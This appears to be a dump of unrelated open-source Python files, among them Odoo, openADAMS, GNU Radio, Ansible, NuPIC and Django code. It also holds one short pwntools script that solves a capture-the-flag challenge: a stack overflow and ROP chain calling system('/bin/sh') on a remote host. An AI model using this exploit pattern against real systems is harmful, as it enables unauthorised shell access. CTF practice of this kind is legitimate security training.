classify_as = self.getParameterValue(lasnoisePro.CLASSIFY_AS)
commands.append(unicode(classify_as))
self.addParametersOutputDirectoryCommands(commands)
self.addParametersOutputAppendixCommands(commands)
self.addParametersPointOutputFormatCommands(commands)
self.addParametersAdditionalCommands(commands)
self.addParametersCoresCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
|
Endika/account-financial-reporting | refs/heads/8.0 | account_financial_report_webkit/wizard/print_journal.py | 30 | # -*- coding: utf-8 -*-
##############################################################################
#
# account_financial_report_webkit module for OpenERP
# Copyright (C) 2012 SYLEAM Info Services (<http://www.syleam.fr/>)
# Sebastien LANGE <sebastien.lange@syleam.fr>
#
# This file is a part of account_financial_report_webkit
#
# account_financial_report_webkit is free software: you can redistribute it
# and/or modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# account_financial_report_webkit is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, orm
import time
class AccountReportPrintJournalWizard(orm.TransientModel):
"""Will launch print journal report and pass requiered args"""
_inherit = "account.common.account.report"
_name = "print.journal.webkit"
_description = "Journals Report"
_columns = {
'amount_currency': fields.boolean("With Currency",
help="It adds the currency column"),
}
_defaults = {
'amount_currency': False,
'journal_ids': False,
'filter': 'filter_period',
}
def _check_fiscalyear(self, cr, uid, ids, context=None):
obj = self.read(cr, uid, ids[0], ['fiscalyear_id', 'filter'],
context=context)
if not obj['fiscalyear_id'] and obj['filter'] == 'filter_no':
return False
return True
_constraints = [
(_check_fiscalyear, 'When no Fiscal year is selected, you must choose \
to filter by periods or by date.', ['filter']),
]
def pre_print_report(self, cr, uid, ids, data, context=None):
data = super(AccountReportPrintJournalWizard, self).\
pre_print_report(cr, uid, ids, data, context)
# will be used to attach the report on the main account
data['ids'] = [data['form']['chart_account_id']]
vals = self.read(cr, uid, ids,
['amount_currency',
'display_account',
'journal_ids'],
context=context)[0]
data['form'].update(vals)
return data
def onchange_filter(self, cr, uid, ids, filter='filter_no',
fiscalyear_id=False, context=None):
res = {}
if filter == 'filter_no':
res['value'] = {'period_from': False,
'period_to': False,
'date_from': False,
'date_to': False}
if filter == 'filter_date':
if fiscalyear_id:
fyear = self.pool.get('account.fiscalyear').browse(
cr, uid, fiscalyear_id, context=context)
date_from = fyear.date_start
date_to = fyear.date_stop > time.strftime(
'%Y-%m-%d') and time.strftime('%Y-%m-%d') \
or fyear.date_stop
else:
date_from, date_to = time.strftime(
'%Y-01-01'), time.strftime('%Y-%m-%d')
res['value'] = {'period_from': False, 'period_to':
False, 'date_from': date_from, 'date_to': date_to}
if filter == 'filter_period' and fiscalyear_id:
start_period = end_period = False
cr.execute('''
SELECT * FROM (SELECT p.id
FROM account_period p
LEFT JOIN account_fiscalyear f
ON (p.fiscalyear_id = f.id)
WHERE f.id = %s
AND COALESCE(p.special, FALSE) = FALSE
ORDER BY p.date_start ASC
LIMIT 1) AS period_start
UNION ALL
SELECT * FROM (SELECT p.id
FROM account_period p
LEFT JOIN account_fiscalyear f
ON (p.fiscalyear_id = f.id)
WHERE f.id = %s
AND p.date_start < NOW()
AND COALESCE(p.special, FALSE) = FALSE
ORDER BY p.date_stop DESC
LIMIT 1) AS period_stop''',
(fiscalyear_id, fiscalyear_id))
periods = [i[0] for i in cr.fetchall()]
if periods:
start_period = end_period = periods[0]
if len(periods) > 1:
end_period = periods[1]
res['value'] = {'period_from': start_period, 'period_to':
end_period, 'date_from': False, 'date_to': False}
return res
def _print_report(self, cursor, uid, ids, data, context=None):
context = context or {}
# we update form with display account value
data = self.pre_print_report(cursor, uid, ids, data, context=context)
return {'type': 'ir.actions.report.xml',
'report_name': 'account.account_report_print_journal_webkit',
'datas': data}
|
bplancher/odoo | refs/heads/9.0 | openerp/addons/test_uninstall/__init__.py | 2355 | # -*- coding: utf-8 -*-
import models
|
VCTLabs/openadams | refs/heads/master | oalogview.py | 1 | # -*- coding: utf-8 -*-
# $Id$
# -------------------------------------------------------------------
# Copyright 2012 Achim K�hler
#
# This file is part of openADAMS.
#
# openADAMS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License,
# or (at your option) any later version.
#
# openADAMS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with openADAMS. If not, see <http://www.gnu.org/licenses/>.
# -------------------------------------------------------------------
import sys
import json
import types
import argparse
import logging
import traceback
from PyQt4 import QtGui, QtCore, QtSql
from PyQt4.QtCore import Qt
# ------------------------------------------------------------------------------
app = QtGui.QApplication(sys.argv)
app.setOrganizationName("")
app.setOrganizationDomain("macht-publik.de")
app.setApplicationName("oalogviewer")
app.setWindowIcon(QtGui.QIcon(":/icons/appicon.png"))
QtCore.QSettings.setDefaultFormat(QtCore.QSettings.IniFormat)
qtTranslator = QtCore.QTranslator()
qtTranslator.load("qt_" + QtCore.QLocale.system().name(), QtCore.QLibraryInfo.location(QtCore.QLibraryInfo.TranslationsPath))
app.installTranslator(qtTranslator)
appTranslator = QtCore.QTranslator()
appTranslator.load("nafms_" + QtCore.QLocale.system().name())
app.installTranslator(appTranslator)
# ------------------------------------------------------------------------------
import _naf_database as nafdb
import _naf_resources
import _naf_textviewer
import _naf_about
from _naf_version import VERSION, VERSION_STR, SVN_STR
WINTITLE = QtCore.QCoreApplication.translate("winTitle", "Log Viewer")
PROGNAME = 'oalogviewer'
ABOUTMSG = u"""oaviewer %s
openADAMS Log Viewer
Copyright (C) 2012 Achim Koehler
%s
""" % (VERSION, SVN_STR)
class cChangeModel(QtSql.QSqlTableModel):
def __init__(self, *args, **kwargs):
super(cChangeModel, self).__init__(*args, **kwargs)
self.setTable("changes")
self.setEditStrategy(QtSql.QSqlTableModel.OnFieldChange)
def origdata(self, index):
return super(cChangeModel, self).data(index, Qt.DisplayRole)
def data(self, index, role = Qt.DisplayRole):
"""
Overrides data() method to provide lookup values in cells
"""
if role == Qt.DisplayRole:
if index.column() == 5:
# changetype column
(changetype, _) = super(cChangeModel, self).data(index, Qt.DisplayRole).toInt()
return nafdb.CHANGESTRING[changetype]
elif index.column() == 3:
# description column
description = unicode(super(cChangeModel, self).data(index, Qt.DisplayRole).toString())
try:
descriptionList = json.loads(description)
value = [item['column'] for item in descriptionList]
return ', '.join(value)
except:
return description
return super(cChangeModel, self).data(index, role)
class cChangeTableView(QtGui.QTableView):
def __init__(self, parent, model, selectionHandler=None):
super(cChangeTableView, self).__init__(parent, sortingEnabled=True)
self.selectionHandler = selectionHandler
self.setModel(model)
hiddencols = (1, 8)
map(self.setColumnHidden, hiddencols, [True]*len(hiddencols))
self.setHeader()
self.resizeColumnToContents(2)
self.setSelectionBehavior(QtGui.QTableView.SelectRows)
self.setSelectionMode(QtGui.QTableView.SingleSelection)
def getHeaderString(self, name):
return {'id': self.tr('Change ID'),
'typeid': self.tr('Artifact Type'),
'title': self.tr('Title'),
'description': self.tr('Affected fields'),
'afid': self.tr('Artifact ID'),
'changetype': self.tr('Change type'),
'date': self.tr('Date'),
'user': self.tr('User'),
'viewpos': self.tr('View pos')}[name]
def setHeader(self):
model = self.model()
for section in range(model.columnCount()):
colname = unicode(model.headerData(section, Qt.Horizontal) .toString())
model.setHeaderData(section, Qt.Horizontal, self.getHeaderString(colname))
def currentChanged(self, current, previous):
super(cChangeTableView, self).currentChanged(current, previous)
if self.selectionHandler: self.selectionHandler(current)
class cDetailView(QtGui.QWidget):
def __init__(self, parent):
super(cDetailView, self).__init__(parent)
self.setLayout(QtGui.QGridLayout())
self.setMinimumSize(200, 200)
def _isHtml(self, string):
if type(string) in types.StringTypes:
return string.startswith("<!")
else:
return False
def updateView(self, data):
try:
itemList = json.loads(data)
except:
return
for label, col in zip([self.tr('Old value'), self.tr('New value')], [1, 2]):
lbl = QtGui.QLabel(label)
lbl.setStyleSheet("font-weight: bold; background-color:rgba(255, 10, 10, 10%); border-style: outset; border-width:2px; border-color:#909090;")
self.layout().addWidget(lbl, 0, col, alignment=Qt.AlignTop)
row = 1
for item in itemList:
for field, col in zip(['old', 'new'], [1, 2]):
if self._isHtml(item['old']) or self._isHtml(item['new']):
widget = _naf_textviewer.cTextEditor(self, readOnly=True)
widget.setImageProvider(_imageProvider)
QtGui.QTextEdit(readOnly=True)
widget.setHtml(item[field])
alignment=Qt.AlignTop
else:
widget = QtGui.QLineEdit()
widget.setText(unicode(item[field]))
alignment=Qt.AlignVCenter
self.layout().addWidget(widget, row, col, alignment=Qt.AlignTop)
if item.has_key('table'):
# this key is available in version 0.3.1 and newer
s = nafdb.getColumnDisplayName(item['table'], item['column'])
else:
s = item['column']
self.layout().addWidget(QtGui.QLabel(s, alignment=alignment), row, 0)
row = row + 1
self.layout().addItem(QtGui.QSpacerItem(1,1, 1, -1), row, 0)
class cMainWin(QtGui.QMainWindow):
def __init__(self, dbName=None):
super(cMainWin, self).__init__()
self.winTitle = WINTITLE
self.setWindowTitle(self.winTitle)
self.setMinimumSize(800, 600)
self.setBaseSize(800, 750)
self.dockWidget = QtGui.QDockWidget(self.tr("Details"), self)
self.dockWidget.setAllowedAreas(Qt.RightDockWidgetArea | Qt.BottomDockWidgetArea)
openAction = QtGui.QAction(QtGui.QIcon(':/icons/database_open.png'), self.tr('Open database'), self,
triggered = self.openDatabase,shortcut=QtGui.QKeySequence.Open)
aboutAction = QtGui.QAction(QtGui.QIcon(':/icons/help-browser.png'), self.tr('About'), self,
triggered=self.showAbout, shortcut=QtGui.QKeySequence.HelpContents)
exitAction = QtGui.QAction(QtGui.QIcon(':/icons/system-log-out.png'), self.tr('Exit'), self,
triggered=self.close, shortcut=QtGui.QKeySequence('Alt+X'))
menuBar = self.menuBar()
fileMenu = menuBar.addMenu(self.tr('&File'))
map(fileMenu.addAction, (openAction, exitAction))
viewMenu = menuBar.addMenu(self.tr('&View'))
map(viewMenu.addAction, (self.dockWidget.toggleViewAction(), ))
helpMenu = menuBar.addMenu(self.tr('&Help'))
map(helpMenu.addAction, (aboutAction, ))
if dbName:
self.openDatabase(None, dbName)
def openDatabase(self, sender=None, fileName=None):
if fileName is None:
fileName = unicode(QtGui.QFileDialog.getOpenFileName(self, self.tr("Open database"), ".", self.tr("Database Files (*.db);;All files (*.*)")))
if fileName == '':
return
try:
self._loadDatabase(fileName)
except:
(type_, value, tb) = sys.exc_info()
self.showExceptionMessageBox(type_, value, tb)
def showAbout(self):
aboutText = unicode(self.tr("""
<div align="center" style="font-size:large;">
<p style="font-size:x-large;"><b>openADAMS Log Viewer %s</b></p>
<p><small>[%s]</small><p>
<p>Copyright (C) 2012 Achim Köhler</p>
<p>Log viewer for the Open "Artifact Documentation And Management System"</p>
<p>See <a href="https://sourceforge.net/projects/openadams/">openADAMS Homepage</a> for details.</p>
<blockquote>This program comes with ABSOLUTELY NO WARRANTY;<br/>
This is free software, and you are welcome to redistribute it<br/>
under the terms of the GNU General Public License; <br/>
see the accompanied file COPYING for details.
</blockquote>
</div>
""")) % (VERSION, VERSION_STR)
_naf_about.cAbout(self, aboutText).exec_()
def _loadDatabase(self, fileName):
self.database = None
self.database = QtSql.QSqlDatabase.addDatabase("QSQLITE")
self.database.setHostName("")
self.database.setDatabaseName(fileName)
self.database.open()
model = cChangeModel(None, self.database)
model.select()
self.tableView = cChangeTableView(self, model, self.tableSelectionChanged)
self.setCentralWidget(self.tableView)
self.detailView = cDetailView(self.dockWidget)
self.dockWidget.setWidget(self.detailView)
self.addDockWidget(Qt.BottomDockWidgetArea, self.dockWidget)
self.setWindowTitle(QtCore.QFileInfo(fileName).baseName() + ' - ' + WINTITLE)
def tableSelectionChanged(self, index):
row = self.tableView.currentIndex().row()
index = self.tableView.model().index(row, 3)
data = unicode(self.tableView.model().origdata(index).toString())
self.updateView(data)
def updateView(self, data):
self.detailView.close()
self.detailView = cDetailView(self.dockWidget)
self.detailView.updateView(data)
self.dockWidget.setWidget(self.detailView)
def showExceptionMessageBox(self, type_, value, tb):
msgBox = QtGui.QMessageBox(QtGui.QMessageBox.Warning, self.tr("Error"), QtCore.QString(unicode(value)))
msgBox.setDetailedText(QtCore.QString(''.join(traceback.format_exception( type_, value, tb))))
msgBox.exec_()
# ------------------------------------------------------------------------------
def _imageProvider(imgId):
query = QtSql.QSqlQuery("SELECT image FROM images WHERE id==%d" % imgId)
query.next()
return query.value(0).toByteArray()
# ------------------------------------------------------------------------------
def start():
parser = argparse.ArgumentParser(prog=PROGNAME,
description=ABOUTMSG,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-V', '--version', action='version', version='%s %s\n%s' % (PROGNAME, VERSION, SVN_STR))
parser.add_argument('-l', '--log', action='store', nargs=1, default=['critical'], type=str,
help='log level, either debug, info, error', metavar='lvl', dest='loglevel',
choices=['debug', 'info', 'error'])
parser.add_argument('databasefile', action='store', type=str, nargs='?',
help='Database file')
namespace=parser.parse_args()
level = {'critical':logging.CRITICAL, 'debug': logging.DEBUG,
'info': logging.INFO, 'error': logging.ERROR}[namespace.loglevel[0]]
logFormat = '%(module)s:%(lineno)s (%(funcName)s): %(message)s'
logging.basicConfig(format=logFormat, level=level,
##, filemode='w', filename='myapp.log'
)
mainwin = cMainWin(namespace.databasefile)
mainwin.show()
sys .exit(app.exec_())
if __name__ == "__main__":
start() |
mbr0wn/gnuradio | refs/heads/master | grc/gui/canvas/port.py | 5 | """
Copyright 2007, 2008, 2009 Free Software Foundation, Inc.
This file is part of GNU Radio
SPDX-License-Identifier: GPL-2.0-or-later
"""
import math
from gi.repository import Gtk, PangoCairo, Pango
from . import colors
from .drawable import Drawable
from .. import Actions, Utils, Constants
from ...core.utils.descriptors import nop_write
from ...core.ports import Port as CorePort
class Port(CorePort, Drawable):
"""The graphical port."""
def __init__(self, parent, direction, **n):
"""
Port constructor.
Create list of connector coordinates.
"""
super(self.__class__, self).__init__(parent, direction, **n)
Drawable.__init__(self)
self._connector_coordinate = (0, 0)
self._hovering = False
self.force_show_label = False
self._area = []
self._bg_color = self._border_color = 0, 0, 0, 0
self._font_color = list(colors.FONT_COLOR)
self._line_width_factor = 1.0
self._label_layout_offsets = 0, 0
self.width_with_label = self.height = 0
self.label_layout = None
@property
def width(self):
return self.width_with_label if self._show_label else Constants.PORT_LABEL_HIDDEN_WIDTH
@width.setter
def width(self, value):
self.width_with_label = value
self.label_layout.set_width(value * Pango.SCALE)
def _update_colors(self):
"""
Get the color that represents this port's type.
Codes differ for ports where the vec length is 1 or greater than 1.
Returns:
a hex color code.
"""
if not self.parent_block.enabled:
self._font_color[-1] = 0.4
color = colors.BLOCK_DISABLED_COLOR
elif self.domain == Constants.GR_MESSAGE_DOMAIN:
color = colors.PORT_TYPE_TO_COLOR.get('message')
else:
self._font_color[-1] = 1.0
color = colors.PORT_TYPE_TO_COLOR.get(self.dtype) or colors.PORT_TYPE_TO_COLOR.get('')
if self.vlen > 1:
dark = (0, 0, 30 / 255.0, 50 / 255.0, 70 / 255.0)[min(4, self.vlen)]
color = tuple(max(c - dark, 0) for c in color)
self._bg_color = color
self._border_color = tuple(max(c - 0.3, 0) for c in color)
def create_shapes(self):
"""Create new areas and labels for the port."""
if self.is_horizontal():
self._area = (0, 0, self.width, self.height)
elif self.is_vertical():
self._area = (0, 0, self.height, self.width)
self.bounds_from_area(self._area)
self._connector_coordinate = {
0: (self.width, self.height / 2),
90: (self.height / 2, 0),
180: (0, self.height / 2),
270: (self.height / 2, self.width)
}[self.connector_direction]
def create_labels(self, cr=None):
"""Create the labels for the socket."""
self.label_layout = Gtk.DrawingArea().create_pango_layout('')
self.label_layout.set_alignment(Pango.Alignment.CENTER)
if cr:
PangoCairo.update_layout(cr, self.label_layout)
if self.domain in (Constants.GR_MESSAGE_DOMAIN, Constants.GR_STREAM_DOMAIN):
self._line_width_factor = 1.0
else:
self._line_width_factor = 2.0
self._update_colors()
layout = self.label_layout
layout.set_markup('<span font_desc="{font}">{name}</span>'.format(
name=Utils.encode(self.name), font=Constants.PORT_FONT
))
label_width, label_height = self.label_layout.get_size()
self.width = 2 * Constants.PORT_LABEL_PADDING + label_width / Pango.SCALE
self.height = (2 * Constants.PORT_LABEL_PADDING + label_height*(3 if self.dtype == 'bus' else 1)) / Pango.SCALE
self._label_layout_offsets = [0, Constants.PORT_LABEL_PADDING]
self.height += self.height % 2 # uneven height
def draw(self, cr):
"""
Draw the socket with a label.
"""
if self.hidden:
return
border_color = self._border_color
cr.set_line_width(self._line_width_factor * cr.get_line_width())
cr.translate(*self.coordinate)
cr.rectangle(*self._area)
cr.set_source_rgba(*self._bg_color)
cr.fill_preserve()
cr.set_source_rgba(*border_color)
cr.stroke()
if not self._show_label:
return # this port is folded (no label)
if self.is_vertical():
cr.rotate(-math.pi / 2)
cr.translate(-self.width, 0)
cr.translate(*self._label_layout_offsets)
cr.set_source_rgba(*self._font_color)
PangoCairo.update_layout(cr, self.label_layout)
PangoCairo.show_layout(cr, self.label_layout)
@property
def connector_coordinate_absolute(self):
"""the coordinate where connections may attach to"""
return [sum(c) for c in zip(
self._connector_coordinate, # relative to port
self.coordinate, # relative to block
self.parent_block.coordinate # abs
)]
@property
def connector_direction(self):
"""Get the direction that the socket points: 0,90,180,270."""
if self.is_source:
return self.rotation
elif self.is_sink:
return (self.rotation + 180) % 360
@nop_write
@property
def rotation(self):
return self.parent_block.rotation
def rotate(self, direction):
"""
Rotate the parent rather than self.
Args:
direction: degrees to rotate
"""
self.parent_block.rotate(direction)
def move(self, delta_coor):
"""Move the parent rather than self."""
self.parent_block.move(delta_coor)
@property
def highlighted(self):
return self.parent_block.highlighted
@highlighted.setter
def highlighted(self, value):
self.parent_block.highlighted = value
@property
def _show_label(self):
"""
Figure out if the label should be hidden
Returns:
true if the label should not be shown
"""
return self._hovering or self.force_show_label or not Actions.TOGGLE_AUTO_HIDE_PORT_LABELS.get_active()
def mouse_over(self):
"""
Called from flow graph on mouse-over
"""
changed = not self._show_label
self._hovering = True
return changed
def mouse_out(self):
"""
Called from flow graph on mouse-out
"""
label_was_shown = self._show_label
self._hovering = False
return label_was_shown != self._show_label
|
bjolivot/ansible | refs/heads/devel | lib/ansible/modules/network/illumos/dladm_etherstub.py | 70 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Adam Števko <adam.stevko@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: dladm_etherstub
short_description: Manage etherstubs on Solaris/illumos systems.
description:
- Create or delete etherstubs on Solaris/illumos systems.
version_added: "2.2"
author: Adam Števko (@xen0l)
options:
name:
description:
- Etherstub name.
required: true
temporary:
description:
- Specifies that the etherstub is temporary. Temporary etherstubs
do not persist across reboots.
required: false
default: false
choices: [ "true", "false" ]
state:
description:
- Create or delete Solaris/illumos etherstub.
required: false
default: "present"
choices: [ "present", "absent" ]
'''
EXAMPLES = '''
# Create 'stub0' etherstub
- dladm_etherstub:
name: stub0
state: present
# Remove 'stub0 etherstub
- dladm_etherstub:
name: stub0
state: absent
'''
RETURN = '''
name:
description: etherstub name
returned: always
type: string
sample: "switch0"
state:
description: state of the target
returned: always
type: string
sample: "present"
temporary:
description: etherstub's persistence
returned: always
type: boolean
sample: "True"
'''
class Etherstub(object):
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.temporary = module.params['temporary']
self.state = module.params['state']
def etherstub_exists(self):
cmd = [self.module.get_bin_path('dladm', True)]
cmd.append('show-etherstub')
cmd.append(self.name)
(rc, _, _) = self.module.run_command(cmd)
if rc == 0:
return True
else:
return False
def create_etherstub(self):
cmd = [self.module.get_bin_path('dladm', True)]
cmd.append('create-etherstub')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def delete_etherstub(self):
cmd = [self.module.get_bin_path('dladm', True)]
cmd.append('delete-etherstub')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True),
temporary=dict(default=False, type='bool'),
state=dict(default='present', choices=['absent', 'present']),
),
supports_check_mode=True
)
etherstub = Etherstub(module)
rc = None
out = ''
err = ''
result = {}
result['name'] = etherstub.name
result['state'] = etherstub.state
result['temporary'] = etherstub.temporary
if etherstub.state == 'absent':
if etherstub.etherstub_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = etherstub.delete_etherstub()
if rc != 0:
module.fail_json(name=etherstub.name, msg=err, rc=rc)
elif etherstub.state == 'present':
if not etherstub.etherstub_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = etherstub.create_etherstub()
if rc is not None and rc != 0:
module.fail_json(name=etherstub.name, msg=err, rc=rc)
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
module.exit_json(**result)
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
marionleborgne/nupic | refs/heads/master | tests/integration/nupic/opf/opf_checkpoint_test/experiments/temporal_multi_step/a/description.py | 6 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2011-2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
###############################################################################
# IMPORTANT!!!
# This params file is dynamically generated by the RunExperimentPermutations
# script. Any changes made manually will be over-written the next time
# RunExperimentPermutations is run!!!
###############################################################################
from nupic.frameworks.opf.expdescriptionhelpers import importBaseDescription
# the sub-experiment configuration
config ={
'modelParams' : {'sensorParams': {'encoders': {u'c0_timeOfDay': None, u'c0_dayOfWeek': None, u'c1': {'name': 'c1', 'clipInput': True, 'n': 275, 'fieldname': 'c1', 'w': 21, 'type': 'AdaptiveScalarEncoder'}, u'c0_weekend': None}}, 'spParams': {'synPermInactiveDec': 0.052500000000000005}, 'tmParams': {'minThreshold': 11, 'activationThreshold': 14, 'pamLength': 3}, 'clParams': {'alpha': 0.050050000000000004}},
'firstRecord': 0,
'lastRecord': 250,
}
mod = importBaseDescription('../base.py', config)
locals().update(mod.__dict__)
|
maneeshd/PyTutorial | refs/heads/master | Advanced/Numpy/NumpyBasics.py | 1 | """
@author: Maneesh D
@email: maneeshd77@gmail.com
@date: 13-03-2017
"""
import numpy as np
a = np.array([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]], dtype=np.int64)
b = np.arange(11, 21).reshape(2, 5)
print(a)
print(a.shape)
print(a.dtype)
print()
print(b)
print(b.shape)
print(b.dtype)
print()
print(a + b)
print()
print(a - b)
print()
print(a * b)
print()
print(a / b)
print()
print(a < 8)
print()
print(a * np.cos(0))
print()
print(b + np.sin(45))
print()
c = np.array([[21, 22, 23, 24], [25, 26, 27, 28]], dtype=np.complex)
print(c)
|
mkoistinen/joule | refs/heads/master | manage.py | 1 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "joule.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
chenyoufu/writeups | refs/heads/master | jarvisoj/pwn_level2_x64.py | 1 | from pwn import *
p = remote("pwn2.jarvisoj.com", 9882)
rop0 = 0x00000000004006b3 #pop rdi ; ret
bin_sh = 0x0000000000600a90 # system@plt address
payload = 'A' * 136 + p64(rop0) + p64(bin_sh) + p64(0x00000000004004c0)
p.send(payload)
p.interactive()
|
tysonclugg/django | refs/heads/master | django/conf/global_settings.py | 39 | """
Default Django settings. Override these with settings in the module pointed to
by the DJANGO_SETTINGS_MODULE environment variable.
"""
# This is defined here as a do-nothing function because we can't import
# django.utils.translation -- that module depends on the settings.
def gettext_noop(s):
return s
####################
# CORE #
####################
DEBUG = False
# Whether the framework should propagate raw exceptions rather than catching
# them. This is useful under some testing situations and should never be used
# on a live site.
DEBUG_PROPAGATE_EXCEPTIONS = False
# Whether to use the "ETag" header. This saves bandwidth but slows down performance.
# Deprecated (RemovedInDjango21Warning) in favor of ConditionalGetMiddleware
# which sets the ETag regardless of this setting.
USE_ETAGS = False
# People who get code error notifications.
# In the format [('Full Name', 'email@example.com'), ('Full Name', 'anotheremail@example.com')]
ADMINS = []
# List of IP addresses, as strings, that:
# * See debug comments, when DEBUG is true
# * Receive x-headers
INTERNAL_IPS = []
# Hosts/domain names that are valid for this site.
# "*" matches anything, ".example.com" matches example.com and all subdomains
ALLOWED_HOSTS = []
# Local time zone for this installation. All choices can be found here:
# https://en.wikipedia.org/wiki/List_of_tz_zones_by_name (although not all
# systems may support all possibilities). When USE_TZ is True, this is
# interpreted as the default user time zone.
TIME_ZONE = 'America/Chicago'
# If you set this to True, Django will use timezone-aware datetimes.
USE_TZ = False
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Languages we provide translations for, out of the box.
LANGUAGES = [
('af', gettext_noop('Afrikaans')),
('ar', gettext_noop('Arabic')),
('ast', gettext_noop('Asturian')),
('az', gettext_noop('Azerbaijani')),
('bg', gettext_noop('Bulgarian')),
('be', gettext_noop('Belarusian')),
('bn', gettext_noop('Bengali')),
('br', gettext_noop('Breton')),
('bs', gettext_noop('Bosnian')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('cy', gettext_noop('Welsh')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('dsb', gettext_noop('Lower Sorbian')),
('el', gettext_noop('Greek')),
('en', gettext_noop('English')),
('en-au', gettext_noop('Australian English')),
('en-gb', gettext_noop('British English')),
('eo', gettext_noop('Esperanto')),
('es', gettext_noop('Spanish')),
('es-ar', gettext_noop('Argentinian Spanish')),
('es-co', gettext_noop('Colombian Spanish')),
('es-mx', gettext_noop('Mexican Spanish')),
('es-ni', gettext_noop('Nicaraguan Spanish')),
('es-ve', gettext_noop('Venezuelan Spanish')),
('et', gettext_noop('Estonian')),
('eu', gettext_noop('Basque')),
('fa', gettext_noop('Persian')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('fy', gettext_noop('Frisian')),
('ga', gettext_noop('Irish')),
('gd', gettext_noop('Scottish Gaelic')),
('gl', gettext_noop('Galician')),
('he', gettext_noop('Hebrew')),
('hi', gettext_noop('Hindi')),
('hr', gettext_noop('Croatian')),
('hsb', gettext_noop('Upper Sorbian')),
('hu', gettext_noop('Hungarian')),
('ia', gettext_noop('Interlingua')),
('id', gettext_noop('Indonesian')),
('io', gettext_noop('Ido')),
('is', gettext_noop('Icelandic')),
('it', gettext_noop('Italian')),
('ja', gettext_noop('Japanese')),
('ka', gettext_noop('Georgian')),
('kk', gettext_noop('Kazakh')),
('km', gettext_noop('Khmer')),
('kn', gettext_noop('Kannada')),
('ko', gettext_noop('Korean')),
('lb', gettext_noop('Luxembourgish')),
('lt', gettext_noop('Lithuanian')),
('lv', gettext_noop('Latvian')),
('mk', gettext_noop('Macedonian')),
('ml', gettext_noop('Malayalam')),
('mn', gettext_noop('Mongolian')),
('mr', gettext_noop('Marathi')),
('my', gettext_noop('Burmese')),
('nb', gettext_noop('Norwegian Bokmål')),
('ne', gettext_noop('Nepali')),
('nl', gettext_noop('Dutch')),
('nn', gettext_noop('Norwegian Nynorsk')),
('os', gettext_noop('Ossetic')),
('pa', gettext_noop('Punjabi')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('sl', gettext_noop('Slovenian')),
('sq', gettext_noop('Albanian')),
('sr', gettext_noop('Serbian')),
('sr-latn', gettext_noop('Serbian Latin')),
('sv', gettext_noop('Swedish')),
('sw', gettext_noop('Swahili')),
('ta', gettext_noop('Tamil')),
('te', gettext_noop('Telugu')),
('th', gettext_noop('Thai')),
('tr', gettext_noop('Turkish')),
('tt', gettext_noop('Tatar')),
('udm', gettext_noop('Udmurt')),
('uk', gettext_noop('Ukrainian')),
('ur', gettext_noop('Urdu')),
('vi', gettext_noop('Vietnamese')),
('zh-hans', gettext_noop('Simplified Chinese')),
('zh-hant', gettext_noop('Traditional Chinese')),
]
# Languages using BiDi (right-to-left) layout
LANGUAGES_BIDI = ["he", "ar", "fa", "ur"]
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
